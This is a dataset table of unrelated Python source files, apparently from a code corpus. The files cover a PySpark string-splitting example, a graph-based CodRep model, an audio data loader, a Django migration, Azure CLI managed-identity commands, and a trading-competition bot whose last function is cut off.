text stringlengths 38 1.54M |
|---|
# -*- coding: utf-8 -*-
"""
author SparkByExamples.com
"""
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import split, col
spark=SparkSession.builder.appName("sparkbyexamples").getOrCreate()
data=data = [('James','','Smith','1991-04-01'),
('Michael','Rose','','2000-05-19'),
('Robert','','Williams','1978-09-05'),
('Maria','Anne','Jones','1967-12-01'),
('Jen','Mary','Brown','1980-02-17')
]
columns=["firstname","middlename","lastname","dob"]
df=spark.createDataFrame(data,columns)
df.printSchema()
df.show(truncate=False)
df1 = df.withColumn('year', split(df['dob'], '-').getItem(0)) \
.withColumn('month', split(df['dob'], '-').getItem(1)) \
.withColumn('day', split(df['dob'], '-').getItem(2))
df1.printSchema()
df1.show(truncate=False)
# Alternatively we can do like below
split_col = pyspark.sql.functions.split(df['dob'], '-')
df2 = df.withColumn('year', split_col.getItem(0)) \
.withColumn('month', split_col.getItem(1)) \
.withColumn('day', split_col.getItem(2))
df2.show(truncate=False)
# Using split() function of Column class
split_col = pyspark.sql.functions.split(df['dob'], '-')
df3 = df.select("firstname","middlename","lastname","dob", split_col.getItem(0).alias('year'),split_col.getItem(1).alias('month'),split_col.getItem(2).alias('day'))
df3.show(truncate=False)
"""
df4=spark.createDataFrame([("20-13-2012-monday",)], ['date',])
df4.select(split(df4.date,'^([\d]+-[\d]+-[\d])').alias('date'),
regexp_replace(split(df4.date,'^([\d]+-[\d]+-[\d]+)').getItem(1),'-','').alias('day')).show()
"""
df4 = spark.createDataFrame([('oneAtwoBthree',)], ['str',])
df4.select(split(df4.str, '[AB]').alias('str')).show()
df4.select(split(df4.str, '[AB]',2).alias('str')).show()
df4.select(split(df4.str, '[AB]',1).alias('str')).show() |
from bisect import bisect_right
from logging import getLogger
from typing import Any, Dict, List, Optional, Union
from dgl import BatchedDGLGraph, unbatch
from pytorch_lightning import data_loader, LightningModule
from torch import stack as torch_stack, Tensor
from torch.nn import LogSoftmax, Module, NLLLoss
from torch.optim import Adam
from torch.optim.lr_scheduler import _LRScheduler as Scheduler
from torch.optim.optimizer import Optimizer
from torch.utils.data import DataLoader, Dataset
from mloncode.data.instance import Instance
from mloncode.modules.graph_encoders.graph_encoder import GraphEncoder
from mloncode.modules.misc.graph_embedding import GraphEmbedding
from mloncode.modules.misc.selector import Selector
from mloncode.utils.torch_helpers import data_if_packed
class CodRepModel(LightningModule):
"""
CodRep Model.
Uses a graph encoder and a projection decoder with an optional RNN.
"""
_logger = getLogger(__name__)
def __init__(
self,
graph_embedder: GraphEmbedding,
graph_encoder: GraphEncoder,
class_projection: Module,
graph_field_name: str,
feature_field_names: List[str],
indexes_field_name: str,
label_field_name: str,
instance: Instance,
train_dataset: Dataset,
eval_dataset: Optional[Dataset],
test_dataset: Optional[Dataset],
batch_size: int,
lr: float,
) -> None:
"""Construct a complete model."""
super().__init__()
self.graph_embedder = graph_embedder
self.graph_encoder = graph_encoder
self.selector = Selector()
self.class_projection = class_projection
self.graph_field_name = graph_field_name
self.feature_field_names = feature_field_names
self.indexes_field_name = indexes_field_name
self.label_field_name = label_field_name
self.softmax = LogSoftmax(dim=1)
self.instance = instance
self.train_dataset = train_dataset
self.eval_dataset = eval_dataset
self.test_dataset = test_dataset
self.batch_size = batch_size
self.lr = lr
def forward(
self,
graph: BatchedDGLGraph,
etypes: Tensor,
features: List[Tensor],
formatting_indexes: Tensor,
) -> Tensor:
"""Forward pass of an embedder, encoder and decoder."""
graph = self.graph_embedder(graph=graph, features=features)
encodings = self.graph_encoder(
graph=graph, feat=graph.ndata["x"], etypes=etypes
)
label_encodings = self.selector(tensor=encodings, indexes=formatting_indexes)
projections = self.class_projection(label_encodings)
return self.softmax(projections)
def training_step(self, batch: Dict[str, Any], batch_nb: int) -> Dict[str, Any]:
graph, etypes = batch[self.graph_field_name]
features = [batch[field_name] for field_name in self.feature_field_names]
formatting_indexes = batch[self.indexes_field_name].indexes
labels = batch[self.label_field_name]
forward = self.forward(graph, etypes, features, formatting_indexes)
loss = NLLLoss(
weight=forward.new_tensor(
[graph.batch_size, formatting_indexes.numel() - graph.batch_size]
)
)(forward, labels)
loss_item = data_if_packed(loss).item()
return dict(
loss=loss,
log=dict(
train_cross_entropy=loss_item,
perplexity=2 ** loss_item,
mrr=self.mrr(labels, graph, formatting_indexes, forward),
),
)
def validation_step(self, batch: Dict[str, Any], batch_nb: int) -> Dict[str, Any]:
graph, etypes = batch[self.graph_field_name]
features = [batch[field_name] for field_name in self.feature_field_names]
formatting_indexes = batch[self.indexes_field_name].indexes
labels = batch[self.label_field_name]
forward = self.forward(graph, etypes, features, formatting_indexes)
loss = NLLLoss(
weight=forward.new_tensor(
[graph.batch_size, formatting_indexes.numel() - graph.batch_size]
)
)(forward, labels)
return dict(
eval_loss=loss,
eval_cross_entropy=self.cross_entropy(loss),
eval_perplexity=self.perplexity(loss),
eval_mrr=self.mrr(labels, graph, formatting_indexes, forward),
)
def validation_end(self, outputs: List[Dict[str, Any]]) -> Dict[str, Any]:
avg_loss = torch_stack([x["eval_loss"] for x in outputs]).mean()
def average(input_list: List[Dict[str, Any]], key: str) -> float:
return sum(i[key] for i in input_list) / len(input_list)
return dict(
avg_val_loss=avg_loss,
log=dict(
eval_loss=avg_loss,
eval_cross_entropy=average(outputs, "eval_cross_entropy"),
eval_perplexity=average(outputs, "eval_perplexity"),
eval_mrr=average(outputs, "eval_mrr"),
),
)
def decode(
self,
*,
batched_graph: BatchedDGLGraph,
indexes: Tensor,
offsets: Tensor,
forward: Tensor,
paths: List[str],
prefix: str = "",
metadata: Optional[Dict[str, Any]] = None
) -> None:
graphs = unbatch(batched_graph)
start = 0
total_number_of_nodes = 0
bounds = []
numpy_indexes = indexes.cpu().numpy()
for graph in graphs:
total_number_of_nodes += graph.number_of_nodes()
end = bisect_right(numpy_indexes, total_number_of_nodes - 1)
bounds.append((start, end))
start = end
for (start, end), path in zip(bounds, paths):
path_probas = forward[start:end, 1]
path_indexes = offsets[start:end]
predictions = path_indexes[path_probas.argsort(descending=True)]
if metadata is not None and "metadata" in metadata:
metadata["metadata"][path] = {
index: ["%.8f" % (2 ** proba)]
for index, proba in zip(path_indexes.tolist(), path_probas.tolist())
}
predictions += 1
print("%s%s %s" % (prefix, path, " ".join(map(str, predictions.numpy()))))
def build_metadata(self) -> Dict[str, Any]:
return dict(columns=["Probability"], metadata={})
def configure_optimizers(
self,
) -> Union[Optimizer, Scheduler, List[Union[Optimizer, Scheduler]]]:
return Adam(self.parameters(), lr=self.lr)
@data_loader
def train_dataloader(self) -> DataLoader:
return DataLoader(
self.train_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
@data_loader
def val_dataloader(self) -> DataLoader:
return (
DataLoader(
self.eval_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
if self.eval_dataset is not None
else None
)
@data_loader
def test_dataloader(self) -> DataLoader:
return (
DataLoader(
self.test_dataset,
shuffle=True,
collate_fn=self.instance.collate,
batch_size=self.batch_size,
num_workers=1,
)
if self.test_dataset is not None
else None
)
@staticmethod
def mrr(
labels: Tensor, batched_graph: BatchedDGLGraph, indexes: Tensor, forward: Tensor
) -> float:
ground_truth = data_if_packed(labels).argmax(dim=0)
graphs = unbatch(batched_graph)
start = 0
total_number_of_nodes = 0
bounds = []
numpy_indexes = indexes.cpu().numpy()
for graph in graphs:
total_number_of_nodes += graph.number_of_nodes()
end = bisect_right(numpy_indexes, total_number_of_nodes - 1)
bounds.append((start, end))
start = end
ranks = []
for start, end in bounds:
predictions = data_if_packed(forward)[start:end, 1].argsort(descending=True)
ground_truth = data_if_packed(labels)[start:end].argmax(dim=0)
ranks.append((predictions == ground_truth).nonzero().item())
return sum(1 / (rank + 1) for rank in ranks) / len(ranks)
@staticmethod
def cross_entropy(loss: Tensor) -> float:
return data_if_packed(loss).item()
@staticmethod
def perplexity(loss: Tensor) -> float:
return 2 ** data_if_packed(loss).item()
|
from pathlib import Path
import re
import torchaudio
def remove_non_alphanumeric(text):
return re.sub(r'[\W_]+', '', text)
def load_data(path_str: str):
"""
Yields waveform and text from a given transcription folder
"""
path = Path(path_str)
with open(path / "metadata.csv") as f:
lines = f.read().splitlines()
for line in lines:
record_id, _text, normalized_text = line.split("|")
audio_path = Path(path) / "wavs" / f"{record_id}.wav"
waveform, _sample_rate = torchaudio.load(audio_path)
yield waveform, remove_non_alphanumeric(normalized_text)
|
# Generated by Django 2.1 on 2018-09-30 13:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('election', '0003_candidate_election_id'),
]
operations = [
migrations.AddField(
model_name='election',
name='election_description',
field=models.TextField(default='', max_length=500),
),
migrations.AddField(
model_name='election',
name='election_pic',
field=models.FileField(null=True, upload_to=''),
),
migrations.AddField(
model_name='election',
name='election_region',
field=models.CharField(default='', max_length=50),
),
]
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ._clierror import ConflictRequestError
from ._utils import wait_till_end
from .vendored_sdks.appplatform.v2023_07_01_preview import models
from azure.cli.core.azclierror import (AzureInternalError, CLIInternalError)
from azure.core.exceptions import HttpResponseError
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.commands import arm as _arm
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import (ResourceType, get_sdk)
from knack.log import get_logger
from time import sleep
logger = get_logger(__name__)
ENABLE_LOWER = "enable"
DISABLE_LOWER = "disable"
UPDATING_LOWER = "updating"
DELETING_LOWER = "deleting"
APP_CREATE_OR_UPDATE_SLEEP_INTERVAL = 2
def app_identity_assign(cmd,
client,
resource_group,
service,
name,
role=None,
scope=None,
system_assigned=None,
user_assigned=None):
"""
Note: Always use sync method to operate managed identity to avoid data inconsistency.
:param role: role name of role assignment for system-assigned managed identity.
:param scope: scope of role assignment for system-assigned managed identity.
:param system_assigned: 1. None or False: Don't change system-assigned managed identity.
2. Enable system-assigned managed identity on app.
:param user_assigned: 1. None: Don't change user-assigned managed identities.
2. A non-empty list of user-assigned managed identity resource id to app.
3. A empty list: should be blocked by validator.
"""
# TODO(jiec): Retire legacy identity assign after migration.
poller = None
if _is_legacy_identity_assign(system_assigned, user_assigned):
poller = _legacy_app_identity_assign(cmd, client, resource_group, service, name)
else:
poller = _new_app_identity_assign(cmd, client, resource_group, service, name, system_assigned, user_assigned)
wait_till_end(poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
if role and scope:
_create_role_assignment(cmd, client, resource_group, service, name, role, scope)
return client.apps.get(resource_group, service, name)
def app_identity_remove(cmd,
client,
resource_group,
service,
name,
system_assigned=None,
user_assigned=None):
"""
Note: Always use sync method to operate managed identity to avoid data inconsistency.
:param system_assigned: 1) None or False: Don't change system-assigned managed identity.
2) True: remove system-assigned managed identity
:param user_assigned: 1) None: Don't change user-assigned managed identities.
2) An empty list: remove all user-assigned managed identities.
3) A non-empty list of user-assigned managed identity resource id to remove.
"""
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError("Failed to remove managed identities since app is in {} state.".format(app.properties.provisioning_state))
if not app.identity:
logger.warning("Skip remove managed identity since no identities assigned to app.")
return
if not app.identity.type:
raise AzureInternalError("Invalid existed identity type {}.".format(app.identity.type))
if app.identity.type == models.ManagedIdentityType.NONE:
logger.warning("Skip remove managed identity since identity type is {}.".format(app.identity.type))
return
# TODO(jiec): For back-compatible, convert to remove system-assigned only case. Remove code after migration.
if system_assigned is None and user_assigned is None:
system_assigned = True
new_user_identities = _get_new_user_identities_for_remove(app.identity.user_assigned_identities, user_assigned)
new_identity_type = _get_new_identity_type_for_remove(app.identity.type, system_assigned, new_user_identities)
user_identity_payload = _get_user_identity_payload_for_remove(new_identity_type, user_assigned)
target_identity = models.ManagedIdentityProperties()
target_identity.type = new_identity_type
target_identity.user_assigned_identities = user_identity_payload
app_resource = models.AppResource()
app_resource.identity = target_identity
poller = client.apps.begin_update(resource_group, service, name, app_resource)
wait_till_end(cmd, poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
else:
return client.apps.get(resource_group, service, name)
def app_identity_force_set(cmd,
client,
resource_group,
service,
name,
system_assigned,
user_assigned):
"""
:param system_assigned: string, disable or enable
:param user_assigned: 1. A single-element string list with 'disable'
2. A non-empty list of user-assigned managed identity resource ID.
"""
exist_app = client.apps.get(resource_group, service, name)
if _app_not_updatable(exist_app):
raise ConflictRequestError("Failed to force set managed identities since app is in {} state.".format(
exist_app.properties.provisioning_state))
new_identity_type = _get_new_identity_type_for_force_set(system_assigned, user_assigned)
user_identity_payload = _get_user_identity_payload_for_force_set(user_assigned)
target_identity = models.ManagedIdentityProperties()
target_identity.type = new_identity_type
target_identity.user_assigned_identities = user_identity_payload
# All read-only attributes will be droped by SDK automatically.
exist_app.identity = target_identity
exist_app.properties.secrets = None
poller = client.apps.begin_create_or_update(resource_group, service, name, exist_app)
wait_till_end(cmd, poller)
poller.result()
if "succeeded" != poller.status().lower():
return poller
else:
return client.apps.get(resource_group, service, name)
def app_identity_show(cmd, client, resource_group, service, name):
app = client.apps.get(resource_group, service, name)
return app.identity
def _is_legacy_identity_assign(system_assigned, user_assigned):
return not system_assigned and not user_assigned
def _legacy_app_identity_assign(cmd, client, resource_group, service, name):
"""
Enable system-assigned managed identity on app.
"""
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError("Failed to enable system-assigned managed identity since app is in {} state.".format(
app.properties.provisioning_state))
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
if app.identity and app.identity.type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
target_identity = models.ManagedIdentityProperties(type=new_identity_type)
app_resource = models.AppResource(identity=target_identity)
logger.warning("Start to enable system-assigned managed identity.")
return client.apps.begin_update(resource_group, service, name, app_resource)
def _new_app_identity_assign(cmd, client, resource_group, service, name, system_assigned, user_assigned):
app = client.apps.get(resource_group, service, name)
if _app_not_updatable(app):
raise ConflictRequestError(
"Failed to assign managed identities since app is in {} state.".format(app.properties.provisioning_state))
new_identity_type = _get_new_identity_type_for_assign(app, system_assigned, user_assigned)
user_identity_payload = _get_user_identity_payload_for_assign(new_identity_type, user_assigned)
identity_payload = models.ManagedIdentityProperties()
identity_payload.type = new_identity_type
identity_payload.user_assigned_identities = user_identity_payload
app_resource = models.AppResource(identity=identity_payload)
logger.warning("Start to assign managed identities to app.")
return client.apps.begin_update(resource_group, service, name, app_resource)
def _get_new_identity_type_for_assign(app, system_assigned, user_assigned):
new_identity_type = None
if app.identity and app.identity.type:
new_identity_type = app.identity.type
else:
new_identity_type = models.ManagedIdentityType.NONE
if system_assigned:
if new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
if user_assigned:
if new_identity_type in (models.ManagedIdentityType.SYSTEM_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
if not new_identity_type or new_identity_type == models.ManagedIdentityType.NONE:
raise CLIInternalError("Internal error: invalid new identity type:{}.".format(new_identity_type))
return new_identity_type
def _get_user_identity_payload_for_assign(new_identity_type, new_user_identity_rid_list):
"""
:param new_user_identity_rid_list: 1. None object.
2. A non-empty list of user-assigned managed identity resource ID.
:return 1. None object.
2. A dict from user-assigned managed identity to an empty object.
"""
uid_payload = {}
if new_identity_type == models.ManagedIdentityType.SYSTEM_ASSIGNED:
pass
elif new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
if new_user_identity_rid_list:
for rid in new_user_identity_rid_list:
uid_payload[rid] = models.UserAssignedManagedIdentity()
if len(uid_payload) == 0:
uid_payload = None
return uid_payload
def _create_role_assignment(cmd, client, resource_group, service, name, role, scope):
app = client.apps.get(resource_group, service, name)
if not app.identity or not app.identity.principal_id:
raise AzureInternalError(
"Failed to create role assignment without object ID(principal ID) of system-assigned managed identity.")
identity_role_id = _arm.resolve_role_id(cmd.cli_ctx, role, scope)
assignments_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION).role_assignments
RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=identity_role_id,
principal_id=app.identity.principal_id)
logger.warning("Creating an assignment with a role '%s' on the scope of '%s'", identity_role_id, scope)
retry_times = 36
assignment_name = _arm._gen_guid()
for i in range(0, retry_times):
try:
assignments_client.create(scope=scope, role_assignment_name=assignment_name,
parameters=parameters)
break
except (HttpResponseError, CloudError) as ex:
if 'role assignment already exists' in ex.message:
logger.warning('Role assignment already exists')
break
elif i < retry_times and ' does not exist in the directory ' in ex.message:
sleep(APP_CREATE_OR_UPDATE_SLEEP_INTERVAL)
logger.warning('Retrying role assignment creation: %s/%s', i + 1,
retry_times)
continue
else:
raise
def _get_new_user_identities_for_remove(exist_user_identity_dict, user_identity_list_to_remove):
"""
:param exist_user_identity_dict: A dict from user-assigned managed identity resource id to identity objecct.
:param user_identity_list_to_remove: None, an empty list or a list of string of user-assigned managed identity resource id to remove.
:return A list of string of user-assigned managed identity resource ID.
"""
if not exist_user_identity_dict:
return []
# None
if user_identity_list_to_remove is None:
return list(exist_user_identity_dict.keys())
# Empty list means remove all user-assigned managed identities
if len(user_identity_list_to_remove) == 0:
return []
# Non-empty list
new_identities = []
for id in exist_user_identity_dict.keys():
if not id.lower() in user_identity_list_to_remove:
new_identities.append(id)
return new_identities
def _get_new_identity_type_for_remove(exist_identity_type, is_remove_system_identity, new_user_identities):
new_identity_type = exist_identity_type
exist_identity_type_str = exist_identity_type.lower()
if exist_identity_type_str == models.ManagedIdentityType.NONE.lower():
new_identity_type = models.ManagedIdentityType.NONE
elif exist_identity_type_str == models.ManagedIdentityType.SYSTEM_ASSIGNED.lower():
if is_remove_system_identity:
new_identity_type = models.ManagedIdentityType.NONE
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif exist_identity_type_str == models.ManagedIdentityType.USER_ASSIGNED.lower():
if not new_user_identities:
new_identity_type = models.ManagedIdentityType.NONE
else:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
elif exist_identity_type_str == models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED.lower():
if is_remove_system_identity and not new_user_identities:
new_identity_type = models.ManagedIdentityType.NONE
elif not is_remove_system_identity and not new_user_identities:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif is_remove_system_identity and new_user_identities:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
else:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
else:
raise AzureInternalError("Invalid identity type: {}.".format(exist_identity_type_str))
return new_identity_type
def _get_user_identity_payload_for_remove(new_identity_type, user_identity_list_to_remove):
"""
:param new_identity_type: ManagedIdentityType
:param user_identity_list_to_remove: None, an empty list or a list of string of user-assigned managed identity resource id to remove.
:return None object or a non-empty dict from user-assigned managed identity resource id to None object
"""
user_identity_payload = {}
if new_identity_type in (models.ManagedIdentityType.USER_ASSIGNED,
models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED):
# empty list means remove all user-assigned managed identites
if user_identity_list_to_remove is not None and len(user_identity_list_to_remove) == 0:
raise CLIInternalError("When remove all user-assigned managed identities, "
"target identity type should not be {}.".format(new_identity_type))
# non-empty list
elif user_identity_list_to_remove:
for id in user_identity_list_to_remove:
user_identity_payload[id] = None
if not user_identity_payload:
user_identity_payload = None
return user_identity_payload
def _get_new_identity_type_for_force_set(system_assigned, user_assigned):
new_identity_type = models.ManagedIdentityType.NONE
if DISABLE_LOWER == system_assigned and DISABLE_LOWER != user_assigned[0]:
new_identity_type = models.ManagedIdentityType.USER_ASSIGNED
elif ENABLE_LOWER == system_assigned and DISABLE_LOWER == user_assigned[0]:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED
elif ENABLE_LOWER == system_assigned and DISABLE_LOWER != user_assigned[0]:
new_identity_type = models.ManagedIdentityType.SYSTEM_ASSIGNED_USER_ASSIGNED
return new_identity_type
def _get_user_identity_payload_for_force_set(user_assigned):
if DISABLE_LOWER == user_assigned[0]:
return None
user_identity_payload = {}
for user_identity_resource_id in user_assigned:
user_identity_payload[user_identity_resource_id] = models.UserAssignedManagedIdentity()
if not user_identity_payload:
user_identity_payload = None
return user_identity_payload
def _app_not_updatable(app):
return app.properties \
and app.properties.provisioning_state \
and app.properties.provisioning_state.lower() in [UPDATING_LOWER, DELETING_LOWER]
|
#!/usr/bin/python
# ~~~~~============== HOW TO RUN ==============~~~~~
# 1) Configure things in CONFIGURATION section
# 2) Change permissions: chmod +x bot.py
# 3) Run in loop: while true; do ./bot.py; sleep 1; done
from __future__ import print_function
import sys
import socket
import json
# ~~~~~============== CONFIGURATION ==============~~~~~
# replace REPLACEME with your team name!
team_name="teamowo"
# This variable dictates whether or not the3 bot is connecting to the prod
# or test exchange. Be careful with this switch!
test_mode = True
# This setting changes which test exchange is connected to.
# 0 is prod-like
# 1 is slower
# 2 is empty
test_exchange_index=0
prod_exchange_hostname="production"
port=25000 + (test_exchange_index if test_mode else 0)
exchange_hostname = "test-exch-" + team_name if test_mode else prod_exchange_hostname
# ~~~~~============== NETWORKING CODE ==============~~~~~
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write("\n")
def read_from_exchange(exchange):
return json.loads(exchange.readline())
# ~~~~~============== FUNCTIONS ==============~~~~~
def add_to_exchange(price, size, direction, symbol, exchange):
global order_id
generate_order_id()
#print({"type": "add", order_id: order_id, "symbol": symbol, "dir": direction, "price": price, "size": size})
write_to_exchange(exchange, {"type": "add", "order_id": order_id, "symbol": symbol, "dir": direction, "price": price, "size": size})
# buy a stock at price
def buy_stock(price, size, symbol):
if not validate_symbol(symbol):
print("INVALID BUY SYMBOL")
return
print("BUYING " + symbol)
add_to_exchange(price, size, "BUY", symbol, exchange)
def buy_stock_XLF(price, size, symbol):
print("HIIIIIIIIIIIIII")
if not validate_symbol(symbol):
print("INVALID BUY SYMBOL")
return
print("BUYING " + symbol)
add_to_exchange(price, size, "BUY", symbol, exchange)
def sell_stock(price, size, symbol):
if not validate_symbol(symbol):
print("INVALID SELL SYMBOL")
return
print("SELLING " + symbol)
add_to_exchange(price, size, "SELL", symbol, exchange)
# ~~~~~============== PARSING MESSAGES ==============~~~~~
'''
Takes in a bond dictionary message, returns the bond price
'''
def parse_message(message):
if message["type"] == "book":
parse_book(message)
elif message["type"] == "fill":
parse_fill(message)
#buy at lowest price, selling for a little bit more than current lowest sell price, but making sure that the sell price > buy price
def parse_book(message):
if message["symbol"] == "BOND":
# get the price and try to buy the lowest
update_stock_values(message) # this is bond, please update haha
bond_market_sell_prices = message["sell"]
bond_market_buy_prices = message["buy"]
'''
if len(bond_market_sell_prices) > 0:
# someone is only selling, so we can buy if the price is right
bond_lowest_sell = bond_market_sell_prices[0][0]
bond_lowest_sell_amount = bond_market_sell_prices[0][1]
if bond_lowest_sell < 1001:
buy_bond(bond_lowest_sell, min(bond_lowest_sell_amount, 100 - inventory['BOND'])) # can only have 100 bonds max
if len(bond_market_buy_prices) > 0:
bond_highest_buy = bond_market_buy_prices[0][0]
bond_highest_buy_amount = bond_market_buy_prices[0][1]
'''
# someone is only buying, so we can try to sell to them
if len(bond_market_sell_prices) == 0 or len(bond_market_buy_prices) == 0:
return
bond_lowest_sell = bond_market_sell_prices[0][0]
bond_lowest_sell_amount = bond_market_sell_prices[0][1]
bond_highest_buy = bond_market_buy_prices[0][0]
bond_highest_buy_amount = bond_market_buy_prices[0][1]
if bond_lowest_sell < 1001:
buy_stock(bond_lowest_sell, min(bond_lowest_sell_amount, 100 - inventory['BOND']), "BOND") # can only have 100 bonds max
sell_stock(max(bond_lowest_sell + 1, bond_highest_buy), inventory['BOND']/2, "BOND")
elif message["symbol"] == "VALBZ":
valbz_market_sell_prices = message["sell"]
valbz_market_buy_prices = message["buy"]
if len(valbz_market_sell_prices) < 1 or len(valbz_market_buy_prices) < 1:
return
valbz_lowest_sell = valbz_market_sell_prices[0][0]
valbz_lowest_sell_amount = valbz_market_sell_prices[0][1]
valbz_highest_buy = valbz_market_buy_prices[0][0]
valbz_highest_buy_amount = valbz_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(valbz_lowest_sell, min(valbz_lowest_sell_amount, 100 - inventory['VALE']), "VALE") # can only have 100 valbzs max
sell_stock(max(valbz_lowest_sell + 1, valbz_highest_buy), int(inventory['VALE']/3), "VALE")
#valbz_lowest_sell_VALBZ = message["sell"]
#valbz_highest_buy_VALBZ = message["buy"]
#if len(valbz_lowest_sell__VALBZ) == 0 or len(valbz_highest_buy_VALBZ == 0):
# return
#valbz_highest_buy_VALBZ_amount = valbz_highest_buy_VALBZ[0][0]
#valbz_lowest_sell_VALBZ_amount = valbz_lowest_sell_VALBZ[0][0]
elif (message["symbol"] == "GS" or message["symbol"] == "MS" or message["symbol"] == "WFC" or message["symbol"] == "BOND"):
update_stock_values(message)
if message["symbol"] == "GS":
gs_market_sell_prices = message["sell"]
gs_market_buy_prices = message["buy"]
if len(gs_market_sell_prices) < 1 or len(gs_market_buy_prices) < 1:
return
gs_lowest_sell = gs_market_sell_prices[0][0]
gs_lowest_sell_amount = gs_market_sell_prices[0][1]
gs_highest_buy = gs_market_buy_prices[0][0]
gs_highest_buy_amount = gs_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(gs_lowest_sell, min(gs_lowest_sell_amount, 100 - inventory['GS']), "GS") # can only have 100 valbzs max
sell_stock(max(gs_lowest_sell + 1, gs_highest_buy), int(inventory['GS']/3), "GS")
if message["symbol"] == "MS":
ms_market_sell_prices = message["sell"]
ms_market_buy_prices = message["buy"]
if len(ms_market_sell_prices) < 1 or len(ms_market_buy_prices) < 1:
return
ms_lowest_sell = ms_market_sell_prices[0][0]
ms_lowest_sell_amount = ms_market_sell_prices[0][1]
ms_highest_buy = ms_market_buy_prices[0][0]
ms_highest_buy_amount = ms_market_buy_prices[0][1]
#if valbz_lowest_sell < 1001:
buy_stock(ms_lowest_sell, min(ms_lowest_sell_amount, 100 - inventory['MS']), "MS") # can only have 100 valbzs max
sell_stock(max(ms_lowest_sell + 1, ms_highest_buy), int(inventory['MS']/3), "MS")
elif message['symbol'] == 'XLF':
# weighted average of recent_buy_prices and recent_sell_prices
xlf_market_sell_prices = message['sell']
xlf_market_buy_prices = message['buy']
if len(xlf_market_sell_prices) < 1 or len(xlf_market_buy_prices) < 1:
return
xlf_lowest_sell = xlf_market_sell_prices[0][0]
xlf_lowest_sell_amount = xlf_market_sell_prices[0][1]
xlf_highest_buy = xlf_market_buy_prices[0][0]
xlf_highest_buy_amount = xlf_market_buy_prices[0][1]
if check_recents():
gs_average_price = int(recent_buy_prices["GS"] + recent_sell_prices["GS"])/2
ms_average_price = int(recent_buy_prices['MS'] + recent_sell_prices['MS'])/2
bond_average_price = int(recent_buy_prices["BOND"] + recent_sell_prices["BOND"])/2
wfc_average_price = int(recent_buy_prices["WFC"] + recent_sell_prices["WFC"])/2
xlf_fair_price = gs_average_price * 0.2 + ms_average_price * 0.3 + bond_average_price * 0.3 + wfc_average_price * 0.2
buy_stock(int(xlf_fair_price - 1), 2, 'XLF')
sell_stock(int(xlf_fair_price + 1), int(inventory['XLF'] / 2), "XLF")
#xlf_buy_price = int(recent_buy_prices["GS"] * 0.2 + recent_buy_prices["MS"] * 0.3 + recent_buy_prices["BOND"] * 0.3 + recent_buy_prices["WFC"] * 0.2)
#print(xlf_buy_price)
#xlf_sell_price = int(recent_sell_prices["GS"] * 0.2 + recent_sell_prices["MS"] * 0.3 + recent_sell_prices["BOND"] * 0.3 + recent_sell_prices["WFC"] * 0.2)
#print(xlf_sell_price)
#xlf_buy_amount = int(recent_buy_amounts["GS"] * 0.2 + recent_buy_amounts["MS"] * 0.3 + recent_buy_amounts["BOND"] * 0.3 + recent_buy_amounts["WFC"] * 0.2)
#print(xlf_buy_amount)
#xlf_sell_amount = int(recent_sell_amounts["GS"] * 0.2 + recent_sell_amounts["MS"] * 0.3 + recent_sell_amounts["BOND"] * 0.3 + recent_sell_amounts["WFC"] * 0.2)
#print(xlf_sell_amount)
#buy_stock(xlf_sell_price, xlf_sell_amount, "XLF")
#buy_stock(xlf_lowest_sell, xlf_lowest_sell_amount, 'XLF')
#sell_stock(xlf_sell_price, int(inventory['XLF'] / 2), "XLF")
# sell_stock(max(xlf_buy_price, xlf_highest_buy_amount), int(inventory['XLF'] / 3) -3, "XLF")
#buy_stock(xlf_buy_price, min(100 - inventory["XLF"], 1), "XLF")
#sell_stock(xlf_sell_price, max(int(inventory["XLF"]/3), 3), "XLF")
